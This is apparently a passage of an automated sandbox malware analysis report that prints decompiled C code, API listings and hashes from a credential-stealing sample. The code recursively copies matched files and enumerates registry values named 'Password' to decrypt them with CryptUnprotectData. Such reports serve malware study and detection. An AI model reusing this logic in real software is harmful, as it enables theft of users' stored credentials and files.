                                                                                								 *((char*)(_t127 - 4)) = 1;
                                                                                								E00402C34(_t127 - 0x37c, 1, 0);
                                                                                								_push(_t126);
                                                                                								_push(_t127 - 0x398);
                                                                                								_t123 = _t127 - 0x360;
                                                                                								_t101 = E0040D337(0, _t127 - 0x360, _t126, _t139);
                                                                                								 *((char*)(_t127 - 4)) = 3;
                                                                                								_t103 = E0040D3C3(_t127 - 0x118, _t127 - 0x37c, _t101, _t127 - 0x118);
                                                                                								_t130 = _t132 + 0x14;
                                                                                								_t140 = _t103[0x14] - 0x10;
                                                                                								if(_t103[0x14] >= 0x10) {
                                                                                									_t103 =  *_t103;
                                                                                								}
                                                                                								CopyFileA(_t127 - 0x220, _t103, 1);
                                                                                								E00402C34(_t127 - 0x37c, 1, 0);
                                                                                								 *((char*)(_t127 - 4)) = 1;
                                                                                								E00402C34(_t127 - 0x398, 1, 0);
                                                                                							}
                                                                                							_t114 =  *((intOrPtr*)(_t127 - 0x4e8));
                                                                                							E00411E67(0,  *((intOrPtr*)(_t127 - 0x4e8)), _t123, _t126, _t140, _t127 - 0x118, _t127 - 0x220,  *(_t127 - 0x4e4));
                                                                                						}
                                                                                					}
                                                                                				} while (FindNextFileA( *(_t127 - 0x4e0), _t127 - 0x4d8) != 0);
                                                                                				FindClose( *(_t127 - 0x4e0));
                                                                                				goto L16;
                                                                                			}



















                                                                                0x00411e67
                                                                                0x00411e67
                                                                                0x00411e71
                                                                                0x00411e76
                                                                                0x00411e7c
                                                                                0x00411e84
                                                                                0x00411e8a
                                                                                0x00411e8d
                                                                                0x00411e9c
                                                                                0x00411e9d
                                                                                0x00411ea3
                                                                                0x00411ea9
                                                                                0x00411eb0
                                                                                0x00411eb3
                                                                                0x00411eb9
                                                                                0x00411ec2
                                                                                0x00411ec8
                                                                                0x00411ed2
                                                                                0x00411ed8
                                                                                0x00411ede
                                                                                0x00411ef0
                                                                                0x00411ef4
                                                                                0x00411efa
                                                                                0x00411f0b
                                                                                0x00411f11
                                                                                0x00411f1a
                                                                                0x004120e4
                                                                                0x004120ed
                                                                                0x004120fb
                                                                                0x00412105
                                                                                0x00412105
                                                                                0x00411f20
                                                                                0x00411f25
                                                                                0x00411f25
                                                                                0x00411f30
                                                                                0x00411f39
                                                                                0x00411f3f
                                                                                0x00411f4a
                                                                                0x00411f53
                                                                                0x00411f66
                                                                                0x00411f73
                                                                                0x00411f79
                                                                                0x00411f87
                                                                                0x00411f95
                                                                                0x00411f96
                                                                                0x00411f9c
                                                                                0x00411fb7
                                                                                0x00411fbd
                                                                                0x00411f9e
                                                                                0x00411fa4
                                                                                0x00411faa
                                                                                0x00411faa
                                                                                0x00411fcd
                                                                                0x00411fd3
                                                                                0x00411fd5
                                                                                0x00411fe1
                                                                                0x00411fe2
                                                                                0x00411fe9
                                                                                0x00411ff4
                                                                                0x00412000
                                                                                0x00412005
                                                                                0x00412008
                                                                                0x0041200c
                                                                                0x0041200e
                                                                                0x0041200e
                                                                                0x00412012
                                                                                0x00412021
                                                                                0x0041202f
                                                                                0x00412033
                                                                                0x0041203e
                                                                                0x0041203f
                                                                                0x00412040
                                                                                0x00412046
                                                                                0x0041205a
                                                                                0x0041205e
                                                                                0x00412063
                                                                                0x00412066
                                                                                0x0041206a
                                                                                0x0041206c
                                                                                0x0041206c
                                                                                0x00412078
                                                                                0x00412087
                                                                                0x00412095
                                                                                0x00412099
                                                                                0x00412099
                                                                                0x004120a4
                                                                                0x004120b8
                                                                                0x004120b8
                                                                                0x00411f53
                                                                                0x004120d0
                                                                                0x004120de
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00411E71
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                • __wgetenv.LIBCMT ref: 00411EB9
                                                                                • wsprintfA.USER32 ref: 00411EF4
                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 00411F0B
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 00411F31
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 00411F4B
                                                                                • wsprintfA.USER32 ref: 00411F73
                                                                                • StrCmpCA.SHLWAPI(?,0043E028,?,?,?,?,?,?,?,?,?,key_datas,?,00000001,00000000), ref: 00411F87
                                                                                • wsprintfA.USER32 ref: 00411FA4
                                                                                • wsprintfA.USER32 ref: 00411FB7
                                                                                • PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,key_datas), ref: 00411FCD
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00412012
                                                                                • CopyFileA.KERNEL32 ref: 00412078
                                                                                • FindNextFileA.KERNEL32(?,?,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 004120CA
                                                                                • FindClose.KERNEL32(?,?,?,00000000,0043E028,?,key_datas,?,00000001,00000000,?,?,?,?,00000000), ref: 004120DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$FileFind$CloseCopyCreateDirectoryFirstH_prolog3H_prolog3_MatchNextPathSpec__wgetenv
                                                                                • String ID: %s\%s$%s\*
                                                                                • API String ID: 3298612795-2848263008
                                                                                • Opcode ID: 00047ea306121a9da46b0d024485842454844f848a4dd9f9760eeb0c3188d97a
                                                                                • Instruction ID: 75291c586b25792165afe358cf1dd12e6fb0959463964a56fb5be4a3dc49025e
                                                                                • Opcode Fuzzy Hash: 00047ea306121a9da46b0d024485842454844f848a4dd9f9760eeb0c3188d97a
                                                                                • Instruction Fuzzy Hash: 6D611FB1900258AFDB25DB60CD89FDE777CBB09304F0040EAB609A2191DB759F98CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E0040895E(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t47;
                                                                                				void* _t52;
                                                                                				void* _t65;
                                                                                				CHAR* _t67;
                                                                                				int _t70;
                                                                                				intOrPtr _t81;
                                                                                				CHAR* _t83;
                                                                                				intOrPtr _t90;
                                                                                				intOrPtr _t98;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t103;
                                                                                				void* _t104;
                                                                                				intOrPtr _t105;
                                                                                				intOrPtr _t114;
                                                                                
                                                                                				_t96 = __edi;
                                                                                				_push(0x4a4);
                                                                                				E004219DE(E0043639C, __ebx, __edi, __esi);
                                                                                				_t47 =  *((intOrPtr*)(_t100 + 0x28));
                                                                                				_t90 =  *((intOrPtr*)(_t100 + 0x24));
                                                                                				 *((intOrPtr*)(_t100 - 0x4ac)) = _t47;
                                                                                				 *(_t100 - 0x4a8) =  *(_t100 + 0x2c);
                                                                                				_t98 = 0;
                                                                                				 *((intOrPtr*)(_t100 - 4)) = 0;
                                                                                				wsprintfA(_t100 - 0x328, "%s\\*", _t47);
                                                                                				_t102 = _t101 + 0xc;
                                                                                				_t52 = FindFirstFileA(_t100 - 0x328, _t100 - 0x4a0);
                                                                                				 *(_t100 - 0x4a4) = _t52;
                                                                                				if(_t52 == 0xffffffff) {
                                                                                					L15:
                                                                                					E00402C34(_t100 + 8, 1, _t98);
                                                                                					return E00421A61(_t90, _t96, _t98);
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_push(".");
                                                                                					_push(_t100 - 0x474);
                                                                                					if( *0x44a1d8() != 0) {
                                                                                						_push("..");
                                                                                						_push(_t100 - 0x474);
                                                                                						if( *0x44a1d8() != 0) {
                                                                                							_t96 = "%s\\%s";
                                                                                							wsprintfA(_t100 - 0x220, _t96,  *((intOrPtr*)(_t100 - 0x4ac)), _t100 - 0x474);
                                                                                							_t103 = _t102 + 0x10;
                                                                                							_t65 =  *0x44a1d8(_t90, 0x43e028);
                                                                                							_push(_t100 - 0x474);
                                                                                							_t67 = _t100 - 0x118;
                                                                                							if(_t65 != 0) {
                                                                                								wsprintfA(_t67, _t96, _t90);
                                                                                								_t104 = _t103 + 0x10;
                                                                                							} else {
                                                                                								wsprintfA(_t67, "%s");
                                                                                								_t104 = _t103 + 0xc;
                                                                                							}
                                                                                							_t70 = PathMatchSpecA(_t100 - 0x474,  *(_t100 - 0x4a8));
                                                                                							_t111 = _t70;
                                                                                							if(_t70 != 0) {
                                                                                								_push(_t90);
                                                                                								_push(_t100 - 0x360);
                                                                                								_t96 = _t100 + 8;
                                                                                								E0040D337(_t90, _t100 + 8, _t98, _t111);
                                                                                								_push(_t100 - 0x118);
                                                                                								_push(_t100 - 0x344);
                                                                                								 *((char*)(_t100 - 4)) = 1;
                                                                                								E0040D337(_t90, _t100 + 8, _t98, _t111);
                                                                                								_t104 = _t104 + 0x10;
                                                                                								 *((char*)(_t100 - 4)) = 2;
                                                                                								_t112 =  *((intOrPtr*)(_t100 - 0x34c)) - 0x10;
                                                                                								_t81 =  *((intOrPtr*)(_t100 - 0x360));
                                                                                								if( *((intOrPtr*)(_t100 - 0x34c)) < 0x10) {
                                                                                									_t81 = _t100 - 0x360;
                                                                                								}
                                                                                								_push(_t81);
                                                                                								E004088DB(_t90, _t96, _t98, _t112);
                                                                                								_t83 =  *(_t100 - 0x344);
                                                                                								if( *((intOrPtr*)(_t100 - 0x330)) < 0x10) {
                                                                                									_t83 = _t100 - 0x344;
                                                                                								}
                                                                                								CopyFileA(_t100 - 0x220, _t83, 1);
                                                                                								 *0x44a338 =  *0x44a338 + 1;
                                                                                								_t114 =  *0x44a338;
                                                                                								E00402C34(_t100 - 0x344, 1, _t98);
                                                                                								 *((char*)(_t100 - 4)) = 0;
                                                                                								E00402C34(_t100 - 0x360, 1, _t98);
                                                                                							}
                                                                                							_push( *(_t100 - 0x4a8));
                                                                                							_push(_t100 - 0x220);
                                                                                							_push(_t100 - 0x118);
                                                                                							_t105 = _t104 - 0x1c;
                                                                                							 *((intOrPtr*)(_t100 - 0x4b0)) = _t105;
                                                                                							E0040410F(_t105, _t100 + 8);
                                                                                							E0040895E(_t90, _t96, _t105, _t114);
                                                                                							_t102 = _t105 + 0x28;
                                                                                							_t98 = 0;
                                                                                						}
                                                                                					}
                                                                                				} while (FindNextFileA( *(_t100 - 0x4a4), _t100 - 0x4a0) != 0);
                                                                                				FindClose( *(_t100 - 0x4a4));
                                                                                				goto L15;
                                                                                			}



















                                                                                0x0040895e
                                                                                0x0040895e
                                                                                0x00408968
                                                                                0x0040896d
                                                                                0x00408973
                                                                                0x00408976
                                                                                0x0040897c
                                                                                0x0040898e
                                                                                0x00408991
                                                                                0x00408994
                                                                                0x0040899a
                                                                                0x004089ab
                                                                                0x004089b1
                                                                                0x004089ba
                                                                                0x00408b5a
                                                                                0x00408b60
                                                                                0x00408b6a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004089c0
                                                                                0x004089c0
                                                                                0x004089c0
                                                                                0x004089cb
                                                                                0x004089d4
                                                                                0x004089da
                                                                                0x004089e5
                                                                                0x004089ee
                                                                                0x00408a01
                                                                                0x00408a0e
                                                                                0x00408a14
                                                                                0x00408a1d
                                                                                0x00408a2b
                                                                                0x00408a2c
                                                                                0x00408a32
                                                                                0x00408a48
                                                                                0x00408a4e
                                                                                0x00408a34
                                                                                0x00408a3a
                                                                                0x00408a40
                                                                                0x00408a40
                                                                                0x00408a5e
                                                                                0x00408a64
                                                                                0x00408a66
                                                                                0x00408a72
                                                                                0x00408a73
                                                                                0x00408a74
                                                                                0x00408a77
                                                                                0x00408a82
                                                                                0x00408a89
                                                                                0x00408a8a
                                                                                0x00408a8e
                                                                                0x00408a93
                                                                                0x00408a96
                                                                                0x00408a9a
                                                                                0x00408aa1
                                                                                0x00408aa7
                                                                                0x00408aa9
                                                                                0x00408aa9
                                                                                0x00408aaf
                                                                                0x00408ab0
                                                                                0x00408abc
                                                                                0x00408ac3
                                                                                0x00408ac5
                                                                                0x00408ac5
                                                                                0x00408ad5
                                                                                0x00408adb
                                                                                0x00408adb
                                                                                0x00408aea
                                                                                0x00408af8
                                                                                0x00408afc
                                                                                0x00408afc
                                                                                0x00408b01
                                                                                0x00408b0d
                                                                                0x00408b14
                                                                                0x00408b15
                                                                                0x00408b1d
                                                                                0x00408b24
                                                                                0x00408b29
                                                                                0x00408b2e
                                                                                0x00408b31
                                                                                0x00408b31
                                                                                0x004089ee
                                                                                0x00408b46
                                                                                0x00408b54
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$FileFind$CloseCopyFirstH_prolog3_MatchNextPathSpec
                                                                                • String ID: %s\%s$%s\*
                                                                                • API String ID: 1082190125-2848263008
                                                                                • Opcode ID: b11cad1dccdafe5c3db91d0ae713c377eb21691d999184cee17981fd547f3a6e
                                                                                • Instruction ID: 051fd0e55c7d2c1ce1bf46136d8f65435a4ce218a127611a820740890cc1747d
                                                                                • Opcode Fuzzy Hash: b11cad1dccdafe5c3db91d0ae713c377eb21691d999184cee17981fd547f3a6e
                                                                                • Instruction Fuzzy Hash: 4E514DB1940218ABDB25EB60CD89FDA777CEF09314F0001EAF649A2181DB759B948F5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E004032BE(void* __ebx, char* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t97;
                                                                                				intOrPtr _t111;
                                                                                				intOrPtr* _t112;
                                                                                				intOrPtr _t116;
                                                                                				signed int _t118;
                                                                                				void* _t119;
                                                                                				signed int _t130;
                                                                                				intOrPtr* _t134;
                                                                                				intOrPtr _t139;
                                                                                				intOrPtr* _t142;
                                                                                				intOrPtr _t148;
                                                                                				intOrPtr* _t153;
                                                                                				long _t162;
                                                                                				void* _t163;
                                                                                				signed int _t164;
                                                                                				intOrPtr _t170;
                                                                                				signed int _t173;
                                                                                				intOrPtr _t176;
                                                                                				intOrPtr _t180;
                                                                                				intOrPtr _t181;
                                                                                				void* _t186;
                                                                                				signed int _t187;
                                                                                				signed int _t188;
                                                                                				signed int _t189;
                                                                                				void* _t193;
                                                                                				signed int* _t195;
                                                                                				void* _t196;
                                                                                				signed int _t197;
                                                                                				void* _t199;
                                                                                				void* _t200;
                                                                                				void* _t202;
                                                                                
                                                                                				_t200 = _t199 - 0xc44;
                                                                                				_t197 = _t200 - 4;
                                                                                				_t97 =  *0x447674; // 0x4124c941
                                                                                				 *(_t197 + 0xc44) = _t97 ^ _t197;
                                                                                				_push(0x38);
                                                                                				E00421975(E004368AC, __ebx, __edi, __esi);
                                                                                				_t195 =  *(_t197 + 0xc50);
                                                                                				_t162 = 0;
                                                                                				 *(_t197 - 0x2c) = 0;
                                                                                				 *((intOrPtr*)(_t197 - 0x28)) = __edx;
                                                                                				 *(_t197 - 0x44) = _t195;
                                                                                				 *(_t197 - 0x14) = 0x80000001;
                                                                                				 *_t195 = 0;
                                                                                				_t195[1] = 0;
                                                                                				_t195[2] = 0;
                                                                                				 *(_t197 - 4) = 0;
                                                                                				 *((intOrPtr*)(__edx)) = 0;
                                                                                				_t184 = _t197 - 0x14;
                                                                                				 *(_t197 - 0x2c) = 1;
                                                                                				if(RegOpenKeyExA(0x80000001, __ecx, 0, 0x20019, _t197 - 0x14) != 0) {
                                                                                					L34:
                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
                                                                                					_pop(_t186);
                                                                                					_pop(_t196);
                                                                                					_pop(_t163);
                                                                                					return E0041DEB4(_t195, _t163,  *(_t197 + 0xc44) ^ _t197, _t184, _t186, _t196);
                                                                                				}
                                                                                				_push(_t197 - 0x10);
                                                                                				_push(_t197 + 0x844);
                                                                                				_push(_t197 - 0x1c);
                                                                                				_push(0);
                                                                                				_push(_t197 - 0x20);
                                                                                				_push(_t197 + 0x444);
                                                                                				 *((intOrPtr*)(_t197 - 0x18)) = 0;
                                                                                				 *(_t197 - 0x20) = 0xff;
                                                                                				 *((intOrPtr*)(_t197 - 0x1c)) = 3;
                                                                                				 *((char*)(_t197 + 0x444)) = 0;
                                                                                				_push(0);
                                                                                				while(RegEnumValueA( *(_t197 - 0x14), ??, ??, ??, ??, ??, ??, ??) == 0) {
                                                                                					_t111 = 0xf;
                                                                                					 *((intOrPtr*)(_t197 + 0x18)) = _t111;
                                                                                					 *(_t197 + 0x14) = _t162;
                                                                                					 *(_t197 + 4) = _t162;
                                                                                					 *((intOrPtr*)(_t197 + 0x34)) = _t111;
                                                                                					 *(_t197 + 0x30) = _t162;
                                                                                					 *(_t197 + 0x20) = _t162;
                                                                                					_t112 = _t197 + 0x444;
                                                                                					 *(_t197 - 4) = 1;
                                                                                					_t187 = _t112 + 1;
                                                                                					do {
                                                                                						_t170 =  *_t112;
                                                                                						_t112 = _t112 + 1;
                                                                                						__eflags = _t170 - _t162;
                                                                                					} while (__eflags != 0);
                                                                                					E00403A16(_t197 + 4, __eflags, _t197 + 0x444, _t112 - _t187);
                                                                                					_t116 =  *((intOrPtr*)(_t197 - 0x1c));
                                                                                					 *_t197 = _t116;
                                                                                					 *(_t197 + 0x3c) =  *(_t197 - 0x10);
                                                                                					__eflags = _t116 - 3;
                                                                                					if(_t116 != 3) {
                                                                                						__eflags = _t116 - 1;
                                                                                						if(_t116 != 1) {
                                                                                							__eflags = _t116 - 4;
                                                                                							if(_t116 == 4) {
                                                                                								 *((intOrPtr*)(_t197 + 0x40)) =  *((intOrPtr*)(_t197 + 0x844));
                                                                                							}
                                                                                							L21:
                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x28)))) =  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x28)))) + 1;
                                                                                							_t173 = _t195[1];
                                                                                							_t118 = _t197;
                                                                                							__eflags = _t118 - _t173;
                                                                                							if(_t118 >= _t173) {
                                                                                								L27:
                                                                                								__eflags = _t173 - _t195[2];
                                                                                								if(_t173 == _t195[2]) {
                                                                                									E0040399D(_t162, _t187, _t195);
                                                                                								}
                                                                                								_t119 = _t195[1];
                                                                                								 *(_t197 - 0x30) = _t119;
                                                                                								 *(_t197 - 0x24) = _t119;
                                                                                								 *(_t197 - 4) = 3;
                                                                                								__eflags = _t119 - _t162;
                                                                                								if(__eflags == 0) {
                                                                                									L32:
                                                                                									_t195[1] = _t195[1] + 0x44;
                                                                                									_t81 = _t197 - 0x18;
                                                                                									 *_t81 =  *((intOrPtr*)(_t197 - 0x18)) + 1;
                                                                                									__eflags =  *_t81;
                                                                                									 *(_t197 - 0x20) = 0x400;
                                                                                									 *(_t197 - 0x10) = 0x400;
                                                                                									 *(_t197 - 4) = _t162;
                                                                                									E00402C34(_t197 + 0x20, 1, _t162);
                                                                                									E00402C34(_t197 + 4, 1, _t162);
                                                                                									_push(_t197 - 0x10);
                                                                                									_push(_t197 + 0x844);
                                                                                									_push(_t197 - 0x1c);
                                                                                									_push(_t162);
                                                                                									_push(_t197 - 0x20);
                                                                                									_push(_t197 + 0x444);
                                                                                									_push( *((intOrPtr*)(_t197 - 0x18)));
                                                                                									continue;
                                                                                								} else {
                                                                                									_t164 = _t197;
                                                                                									L31:
                                                                                									_push(_t119);
                                                                                									E004040CA(_t164, _t173, _t187, _t195, __eflags);
                                                                                									_t162 = 0;
                                                                                									__eflags = 0;
                                                                                									goto L32;
                                                                                								}
                                                                                							}
                                                                                							_t184 =  *_t195;
                                                                                							__eflags = _t184 - _t118;
                                                                                							if(_t184 > _t118) {
                                                                                								goto L27;
                                                                                							}
                                                                                							_t130 = _t118 - _t184;
                                                                                							asm("cdq");
                                                                                							_t188 = 0x44;
                                                                                							_t184 = _t130 % _t188;
                                                                                							_t189 = _t130 / _t188;
                                                                                							__eflags = _t173 - _t195[2];
                                                                                							if(_t173 == _t195[2]) {
                                                                                								E0040399D(_t162, _t189, _t195);
                                                                                							}
                                                                                							_t119 = _t195[1];
                                                                                							_t187 = _t189 * 0x44 +  *_t195;
                                                                                							 *(_t197 - 0x24) = _t119;
                                                                                							 *(_t197 - 0x30) = _t119;
                                                                                							 *(_t197 - 4) = 2;
                                                                                							__eflags = _t119 - _t162;
                                                                                							if(__eflags == 0) {
                                                                                								goto L32;
                                                                                							} else {
                                                                                								_t164 = _t187;
                                                                                								goto L31;
                                                                                							}
                                                                                						}
                                                                                						_t134 = _t197 + 0x844;
                                                                                						_t184 = _t134 + 1;
                                                                                						do {
                                                                                							_t176 =  *_t134;
                                                                                							_t134 = _t134 + 1;
                                                                                							__eflags = _t176 - _t162;
                                                                                						} while (__eflags != 0);
                                                                                						L18:
                                                                                						E00403A16(_t197 + 0x20, __eflags, _t197 + 0x844, _t134 - _t184);
                                                                                						goto L21;
                                                                                					}
                                                                                					_t139 = E0041E5C0(_t197 + 0x444, "Password");
                                                                                					__eflags = _t139;
                                                                                					if(_t139 == 0) {
                                                                                						E00404050(_t197 + 0x844, "%S", _t197 + 0x844);
                                                                                						_t142 = _t197 + 0x844;
                                                                                						_t200 = _t200 + 0xc;
                                                                                						_t184 = _t142 + 1;
                                                                                						do {
                                                                                							_t180 =  *_t142;
                                                                                							_t142 = _t142 + 1;
                                                                                							__eflags = _t180 - _t162;
                                                                                						} while (__eflags != 0);
                                                                                						goto L18;
                                                                                					}
                                                                                					 *(_t197 - 0x24) = HeapAlloc(GetProcessHeap(), 8, 0x400);
                                                                                					 *((intOrPtr*)(_t197 - 0x3c)) = _t197 + 0x845;
                                                                                					 *((intOrPtr*)(_t197 - 0x40)) =  *(_t197 - 0x10) - 1;
                                                                                					_t148 =  *0x44a130(_t197 - 0x40, _t162, _t162, _t162, _t162, 1, _t197 - 0x38);
                                                                                					__eflags = _t148;
                                                                                					if(_t148 == 0) {
                                                                                						_t193 = 0x43e028;
                                                                                					} else {
                                                                                						_t193 =  *(_t197 - 0x24);
                                                                                						WideCharToMultiByte(_t162, _t162,  *(_t197 - 0x34),  *(_t197 - 0x38), _t193, 0x400, _t162, _t162);
                                                                                						LocalFree( *(_t197 - 0x34));
                                                                                					}
                                                                                					E0041E985(_t197 + 0x44, 0x400, _t193);
                                                                                					_t202 = _t200 + 0xc;
                                                                                					HeapFree(GetProcessHeap(), _t162, _t193);
                                                                                					_t153 = _t197 + 0x44;
                                                                                					_t187 = _t153 + 1;
                                                                                					do {
                                                                                						_t181 =  *_t153;
                                                                                						_t153 = _t153 + 1;
                                                                                						__eflags = _t181 - _t162;
                                                                                					} while (__eflags != 0);
                                                                                					E00403A16(_t197 + 0x20, __eflags, _t197 + 0x44, _t153 - _t187);
                                                                                					E0041E985(_t197 + 0x44, 0x400, 0x43e028);
                                                                                					_t200 = _t202 + 0xc;
                                                                                					goto L21;
                                                                                				}
                                                                                				goto L34;
                                                                                			}



































                                                                                0x004032bf
                                                                                0x004032c5
                                                                                0x004032c9
                                                                                0x004032d0
                                                                                0x004032d6
                                                                                0x004032dd
                                                                                0x004032e2
                                                                                0x004032e8
                                                                                0x004032ea
                                                                                0x004032f2
                                                                                0x004032f5
                                                                                0x004032f8
                                                                                0x004032fb
                                                                                0x004032fd
                                                                                0x00403300
                                                                                0x00403303
                                                                                0x00403306
                                                                                0x00403308
                                                                                0x00403314
                                                                                0x00403323
                                                                                0x004035ad
                                                                                0x004035b2
                                                                                0x004035ba
                                                                                0x004035bb
                                                                                0x004035bc
                                                                                0x004035d1
                                                                                0x004035d1
                                                                                0x0040332c
                                                                                0x00403333
                                                                                0x00403337
                                                                                0x00403338
                                                                                0x0040333c
                                                                                0x00403343
                                                                                0x00403344
                                                                                0x00403347
                                                                                0x0040334e
                                                                                0x00403355
                                                                                0x0040335b
                                                                                0x0040359c
                                                                                0x00403363
                                                                                0x00403364
                                                                                0x00403367
                                                                                0x0040336a
                                                                                0x0040336d
                                                                                0x00403370
                                                                                0x00403373
                                                                                0x00403376
                                                                                0x0040337c
                                                                                0x00403383
                                                                                0x00403386
                                                                                0x00403386
                                                                                0x00403388
                                                                                0x00403389
                                                                                0x00403389
                                                                                0x0040339a
                                                                                0x0040339f
                                                                                0x004033a5
                                                                                0x004033a8
                                                                                0x004033ab
                                                                                0x004033ae
                                                                                0x004034b3
                                                                                0x004034b6
                                                                                0x004034dc
                                                                                0x004034df
                                                                                0x004034e7
                                                                                0x004034e7
                                                                                0x004034ea
                                                                                0x004034ed
                                                                                0x004034ef
                                                                                0x004034f2
                                                                                0x004034f5
                                                                                0x004034f7
                                                                                0x0040352d
                                                                                0x0040352d
                                                                                0x00403530
                                                                                0x00403532
                                                                                0x00403532
                                                                                0x00403537
                                                                                0x0040353a
                                                                                0x0040353d
                                                                                0x00403540
                                                                                0x00403544
                                                                                0x00403546
                                                                                0x00403553
                                                                                0x00403553
                                                                                0x00403557
                                                                                0x00403557
                                                                                0x00403557
                                                                                0x00403565
                                                                                0x00403568
                                                                                0x0040356b
                                                                                0x0040356e
                                                                                0x00403579
                                                                                0x00403581
                                                                                0x00403588
                                                                                0x0040358c
                                                                                0x0040358d
                                                                                0x00403591
                                                                                0x00403598
                                                                                0x00403599
                                                                                0x00000000
                                                                                0x00403548
                                                                                0x00403548
                                                                                0x0040354b
                                                                                0x0040354b
                                                                                0x0040354c
                                                                                0x00403551
                                                                                0x00403551
                                                                                0x00000000
                                                                                0x00403551
                                                                                0x00403546
                                                                                0x004034f9
                                                                                0x004034fb
                                                                                0x004034fd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004034ff
                                                                                0x00403503
                                                                                0x00403504
                                                                                0x00403505
                                                                                0x00403507
                                                                                0x00403509
                                                                                0x0040350c
                                                                                0x0040350e
                                                                                0x0040350e
                                                                                0x00403513
                                                                                0x00403519
                                                                                0x0040351b
                                                                                0x0040351e
                                                                                0x00403521
                                                                                0x00403525
                                                                                0x00403527
                                                                                0x00000000
                                                                                0x00403529
                                                                                0x00403529
                                                                                0x00000000
                                                                                0x00403529
                                                                                0x00403527
                                                                                0x004034b8
                                                                                0x004034be
                                                                                0x004034c1
                                                                                0x004034c1
                                                                                0x004034c3
                                                                                0x004034c4
                                                                                0x004034c4
                                                                                0x004034c8
                                                                                0x004034d5
                                                                                0x00000000
                                                                                0x004034d5
                                                                                0x004033c0
                                                                                0x004033c7
                                                                                0x004033c9
                                                                                0x00403499
                                                                                0x0040349e
                                                                                0x004034a4
                                                                                0x004034a7
                                                                                0x004034aa
                                                                                0x004034aa
                                                                                0x004034ac
                                                                                0x004034ad
                                                                                0x004034ad
                                                                                0x00000000
                                                                                0x004034b1
                                                                                0x004033e6
                                                                                0x004033ef
                                                                                0x00403401
                                                                                0x00403404
                                                                                0x0040340a
                                                                                0x0040340c
                                                                                0x00403432
                                                                                0x0040340e
                                                                                0x0040340e
                                                                                0x00403421
                                                                                0x0040342a
                                                                                0x0040342a
                                                                                0x00403441
                                                                                0x00403446
                                                                                0x00403452
                                                                                0x00403458
                                                                                0x0040345b
                                                                                0x0040345e
                                                                                0x0040345e
                                                                                0x00403460
                                                                                0x00403461
                                                                                0x00403461
                                                                                0x0040346f
                                                                                0x00403482
                                                                                0x00403487
                                                                                0x00000000
                                                                                0x00403487
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004032DD
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,00000038), ref: 0040331B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,00000000,00020019,?,00000038), ref: 004033D9
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00020019,?,00000038), ref: 004033E0
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00403404
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000,?,00000000,00020019,?,00000038), ref: 00403421
                                                                                • LocalFree.KERNEL32(?,?,00000000,00020019,?,00000038), ref: 0040342A
                                                                                • _strcpy_s.LIBCMT ref: 00403441
                                                                                • GetProcessHeap.KERNEL32(00000000,0043E028,00020019,?,00000038), ref: 0040344B
                                                                                • HeapFree.KERNEL32(00000000), ref: 00403452
                                                                                • _strcpy_s.LIBCMT ref: 00403482
